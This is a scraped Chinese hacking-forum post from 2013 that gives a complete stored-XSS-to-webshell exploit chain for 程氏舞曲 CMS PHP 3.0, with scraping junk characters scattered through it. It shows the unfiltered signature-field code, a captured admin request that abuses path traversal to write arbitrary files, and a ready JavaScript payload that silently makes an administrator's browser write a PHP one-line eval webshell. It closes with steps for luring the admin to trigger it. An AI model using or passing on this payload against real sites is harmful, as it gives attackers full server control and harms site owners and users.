中国网络渗透测试联盟

标题: 程氏舞曲CMSPHP3.0 储存型xss getshell [打印本页]
作者: admin    时间: 2013-11-6 18:09
标题: 程氏舞曲CMSPHP3.0 储存型xss getshell
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
( b+ |' W. Y3 D: ~官网已经修补了,所以重新下了源码
+ X9 I: @! K' S' c0 X8 W因为 后台登入 还需要认证码 所以 注入就没看了。$ `, W5 o+ o  f" K7 s/ S- S% p
存在 xss6 r0 x; R/ U  P
漏洞文件 user/member/skin_edit.php
8 L( o  H  j5 z, M本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:& B) a6 Y4 ?: X1 p3 ~6 I6 w) A
  9 t' p0 j7 T: B# g4 t# ]$ [
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
/ K3 A% W5 W: R) K  7 L! g- x* A" r2 p
</textarea></td></tr>, y' p9 p! S0 {+ z1 |. h
  
: Z# X/ [) ?% p+ R* R$ v; D, ]             user/do.php
9 l2 F) i) j8 ]& A: C: e6 A6 k' K6 P( n, P5 d& u/ b# u( W; L
; @: r* q4 D8 u0 T3 U. |' ~' `/ W' y
if($op=='zl'){ //资料
. o. y8 Y" \, u- s. N$ g7 t  
9 T7 c/ R& N/ T! O             if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
1 g8 T3 E/ b6 G) k5 v             exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
1 \* g% `2 ?& V6 Z9 |' ^  
- t& K: q/ ^/ l5 l  L8 J             $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',6 K- A2 [3 J+ x9 C: v) u) s
  
: q+ R! _7 N0 H, C6 M  {, O             CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'6 z# Q6 _, W' c% Y7 E5 e
             where CS_Name='".$cscms_name."'";# B, }2 ?: K  l4 h' v$ P
  
, E' E8 T8 V# Z: p5 e             if($db->query($sql)){
8 h4 Q& l8 o0 v6 x  8 h" i) j- C0 y
              exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));: r  `$ u& x$ L5 y# \* z/ ]
  
& s0 j# D; `" B$ @9 \. `# w             }else{
5 o$ N1 L/ h4 }  ) u( k+ \0 F& ~& T4 s
              exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));2 @' l& q/ v% K3 G- Y% s. }# L: C  F
  
$ b+ e" E0 E, o, j             }- _7 a- \4 m' ~- T' h6 ^
- l+ ?, d' E8 a+ {

- {, E8 K- r* A8 L2 o6 T# r& x: `* O" p没有 过滤导致xss产生。
% ?: N5 r0 a8 G$ \1 ^2 K) ?后台 看了下 很奇葩的是可以写任意格式文件。。
+ q5 o$ j7 W2 t6 p抓包。。
" N4 q5 P  s9 f$ |9 K" z" K3 N8 C1 T3 g, T4 F# O6 [! V9 U; k- P0 T( ?  U
, A" g! m$ f& D' v* D
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1* C; Q. M! J/ @# P" z
  ! V1 S  s% t% T3 I7 M6 Q% Y% [. r
Accept: text/html, application/xhtml+xml, */*
: X% A( H  Z/ {! G3 a  $ _  W& T" S- x  R! G  g0 T
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php) d6 X4 A, g" j! v3 w5 }
  
0 M! s4 c% ]; s5 @, O/ B' F  w8 lAccept-Language: zh-CN
8 Y3 m% ?1 P+ }    j& R2 W4 ~7 P3 x: v* P' j! w
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)) g4 y4 ^7 P! a. Y& m
  
' {6 Z! D/ }5 j* l! G1 _Content-Type: application/x-www-form-urlencoded4 O$ B1 E" \& z
  1 ~4 {1 p. ]' L6 Z
Accept-Encoding: gzip, deflate
. T' R5 Y9 O, p  
$ c: e+ C, Q, S, y# ^9 A' |Host: 127.0.0.1
2 i9 g$ z' Q+ ]# u  9 y( c; {, Q( Q% M
Content-Length: 38' ^6 p' v3 i5 s  H; W
  : @$ }8 C3 b" h
DNT: 1
3 ^* A; B7 P/ j" U8 s! H$ {  
1 k) j4 f/ T" x4 q% ^" eConnection: Keep-Alive1 b" v& Q  J2 i0 m  D
  
! u. V. A  M7 o6 C# h1 A' YCache-Control: no-cache( I2 J& w3 I" ^1 I; j
  ' U- M: ^! r8 \# D
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594, \8 \- I+ l  j6 s( i" h
  # e; g+ j7 Q9 g0 J) p

: G8 [4 ~6 Z( l: f% t3 ?name=aaa.php&content=%3Cs%3E%3Ca%25%3E2 G" X2 r, O: p9 m

: z2 _$ u/ z6 j  M1 `( i4 Y' d+ _$ r: g1 s0 p

0 C! c! w' B' k4 w1 D于是 构造js如下。. C( X( U5 n! ~
- v5 ^. x+ y% S6 c1 d
本帖隐藏的内容<script>
0 \$ L8 Q$ T# U6 |# @thisTHost = top.location.hostname;
6 B6 c9 c! W1 z+ H) `9 G, w  * _0 K4 |0 x" e: D1 W, j( K
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
3 M6 s- ]8 U! y" E' I5 K  9 R1 e0 S6 z( X( p1 G. _$ h  ~
function PostSubmit(url, data, msg) { 5 C3 m' a6 O$ j! m
    var postUrl = url;% Q- O+ ]0 b% z1 n7 O# ?- }% J
  
4 ?2 `1 s  J9 u! T* G    var postData = data;
8 ?+ o, G  |) d- Q/ B& W    var msgData = msg;
, b6 D6 @) r# T0 e& l    var ExportForm = document.createElement("FORM"); * `3 z9 z" B: U4 @  E2 I. Y( a
    document.body.appendChild(ExportForm);
% J) f: I( n  a' l    ExportForm.method = "POST";
; U' y% k. L+ C- a3 `    var newElement = document.createElement("input"); 8 x# \9 j6 Y& X, Q! a
    newElement.setAttribute("name", "name");   H5 \' s; L4 S) `9 M' i
    newElement.setAttribute("type", "hidden"); 0 [+ L" [. z5 v+ h7 s
    var newElement2 = document.createElement("input"); " q( K' S: S1 n% S8 E
    newElement2.setAttribute("name", "content");
7 p( ?/ a$ R+ K4 ^    newElement2.setAttribute("type", "hidden"); / I, }, q  h, q, i# {
    ExportForm.appendChild(newElement);
  g" F" I- E9 |$ x: S  s8 i, C3 o% [    ExportForm.appendChild(newElement2); ; _. C# t0 B5 d) u! @5 w( |& u
    newElement.value = postData;
8 I- h  }* w. n" w" \% a    newElement2.value = msgData; + ]6 |% J5 A# o/ o2 V6 J: M/ B! K
    ExportForm.action = postUrl; 4 ]! b+ d, j# [! R( x) E, j
    ExportForm.submit(); % b% B  f0 ?4 y% c% ?+ K# G1 Z
};6 ~7 j7 e6 H7 F- l, `# E
  
. l- m# |5 i6 ~7 \8 tPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");4 l4 U9 ], q* [) `
  
* b7 ^# k# ~: }/ `: P& a</script>3 R6 G8 a  x$ V4 S. }# B
5 J9 q, j6 q3 J8 q! i
$ s8 S) h/ Y- U9 O, H

. j& ?+ q4 g) z: y5 ~) t) Ihttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入! t- ]5 |0 }+ X
用你的账号给管理写个 私信 或者让他访问  你的主页http://127.0.0.1/home/?uid=2(uid自己改)4 q' ]' q7 R$ {7 ]/ o' `5 T/ X
就会 在 skins\index\html\目录下生成 roker.php 一句话。

8 w" \* q* {' j& \3 ]



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2